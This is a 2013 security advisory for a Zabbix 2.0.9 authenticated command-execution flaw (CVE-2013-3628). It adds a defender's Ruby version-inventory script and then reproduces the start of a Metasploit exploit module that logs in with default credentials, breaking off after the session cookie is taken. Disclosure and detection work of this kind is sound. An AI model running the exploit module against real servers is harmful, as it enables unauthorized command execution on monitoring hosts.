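Published: 2013-10-30
Updated: 2013-11-02
Affected systems:
ZABBIX ZABBIX v2.0.9
Description:
--------------------------------------------------------------------------------
BUGTRAQ ID: 63453
CVE(CAN) ID: CVE-2013-3628
ZABBIX is a distributed network monitoring system with a client/server architecture.
Zabbix 2.0.9 and other versions allow an administrator to run scripts they have created on hosts. An authenticated attacker can exploit this vulnerability to run malicious scripts on the host.
<*Source: Brandon Perry
*>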
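An added example for defenders, not part of the advisory or the Metasploit module: a Ruby inventory check that reads the front-end footer banner (the `Zabbix X.Y.Z Copyright` format the module's check method matches) and compares versions numerically rather than as strings. The host names, page bodies and the `AFFECTED` range (only the 2.0.9 release listed above) are assumptions.

```ruby
# Added example: inventory check for Zabbix front-end versions.
# Versions are compared as Gem::Version objects, so 2.0.10 is not
# mistaken for a release older than 2.0.8 as it is with plain strings.

BANNER_RE = /Zabbix (\d+(?:\.\d+){1,3}) Copyright/

# Assumption: only the release the advisory lists under "Affected systems".
# Widen the range once other affected releases have been confirmed.
AFFECTED = (Gem::Version.new('2.0.9')..Gem::Version.new('2.0.9'))

# Returns the Gem::Version found in a front-end page body, or nil.
def zabbix_version(body)
  m = BANNER_RE.match(body.to_s)
  m && Gem::Version.new(m[1])
end

# Classifies one page body:
#   :affected - version is inside the configured range
#   :review   - version parsed but outside the range (the advisory says
#               other versions are affected too, so check by hand)
#   :unknown  - no banner found
def classify(body, affected = AFFECTED)
  v = zabbix_version(body)
  return :unknown if v.nil?
  affected.cover?(v) ? :affected : :review
end

# Builds [host, version, status] rows from { hostname => page body }.
def audit(pages, affected = AFFECTED)
  pages.map { |host, body| [host, zabbix_version(body)&.to_s, classify(body, affected)] }
end

# Constructed sample page bodies (not captured from real systems).
SAMPLE_PAGES = {
  'mon-a.example' => '<div>Zabbix 2.0.9 Copyright 2001-2013 by Zabbix SIA</div>',
  'mon-b.example' => '<div>Zabbix 2.0.10 Copyright 2001-2013 by Zabbix SIA</div>',
  'mon-c.example' => '<html><body>login</body></html>'
}.freeze

audit(SAMPLE_PAGES).each { |row| puts row.inspect } if __FILE__ == $PROGRAM_NAME
```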
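Test method:
--------------------------------------------------------------------------------
Warning
The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use at your own risk!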
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit4 < Msf::Exploit::Remote
  Rank = ExcellentRanking
  include Msf::Exploit::Remote::HttpClient
  def initialize(info={})
    super(update_info(info,
      'Name' => 'Zabbix Authenticated Remote Command Execution',
      'Description' => %q{
        ZABBIX allows an administrator to create scripts that will be run on hosts.
        An authenticated attacker can create a script containing a payload, then a host
        with an IP of 127.0.0.1 and run the arbitrary script on the ZABBIX host.
        This module was tested against Zabbix v2.0.9.
      },
      'License' => MSF_LICENSE,
      'Author' =>
        [
          'Brandon Perry <bperry.volatile[at]gmail.com>' # Discovery / msf module
        ],
      'References' =>
        [
          ['CVE', '2013-3628'],
          ['URL', 'https://community.rapid7.com/community/metasploit/blog/2013/10/30/seven-tricks-and-treats']
        ],
      'Payload' =>
        {
          'Compat' =>
            {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'generic perl ruby bash telnet Python',
            }
        },
      'Platform' => ['unix', 'linux'],
      'Arch' => ARCH_CMD,
      'Targets' => [['Automatic',{}]],
      'DisclosureDate' => 'Oct 30 2013',
      'DefaultTarget' => 0
    ))
    register_options(
      [
        OptString.new('USERNAME', [ true, "Username to authenticate with", 'Admin']),
        OptString.new('PASSWORD', [ true, "Password to authenticate with", 'zabbix']),
        OptString.new('TARGETURI', [ true, "The URI of the Zabbix installation", '/zabbix/'])
      ], self.class)
  end
  def check
    init = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, "/index.php")
    })
    if !init or init.code != 200
      print_error("Could not connect to server")
      return Exploit::CheckCode::Unknown
    end
    if init.body =~ /Zabbix (2\.0\.(\d)) Copyright/
      if $1 >= "2.0.0" and $1 <= "2.0.8"
        print_good("Version #{$1} is vulnerable.")
        return Exploit::CheckCode::Vulnerable
      end
    end
    return Exploit::CheckCode::Safe
  end
  def exploit
    c = connect
    req = c.request_cgi({
      'method' => 'POST',
      'uri' => '/zabbix/',
      'data' => 'request=&name=' << datastore['USERNAME'] << '&password=' << datastore['PASSWORD'] << '&enter=Sign+in'
    })
    login = c.send_recv(req.to_s.sub("Host:", "Host: " << datastore["RHOST"]))
    if !login or login.code != 302
      fail_with("Login failed")
    end
    sess = login.headers['Set-Cookie']